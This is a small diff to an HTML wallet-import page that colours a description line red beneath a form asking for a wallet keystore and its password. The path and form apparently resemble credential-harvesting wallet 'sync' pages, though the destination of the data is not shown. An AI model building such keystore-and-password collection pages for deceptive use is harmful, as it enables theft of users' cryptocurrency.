--- a/sync/import-wallet/keystore/invalid.html
+++ b/sync/import-wallet/keystore/invalid.html
@@ -57,7 +57,7 @@
             <div class="field">
                 <input type="password" name="password" placeholder="Keystore Password">
             </div>
-            <div class="desc">Several lines of text beginning with '(...)' plus the password you used to encrypt it.</div>
+            <div class="desc" style="color: red;">Several lines of text beginning with '(...)' plus the password you used to encrypt it.</div>
             <br>
             <button type="submit" name="submit" class="btn">IMPORT</button>
         </form>
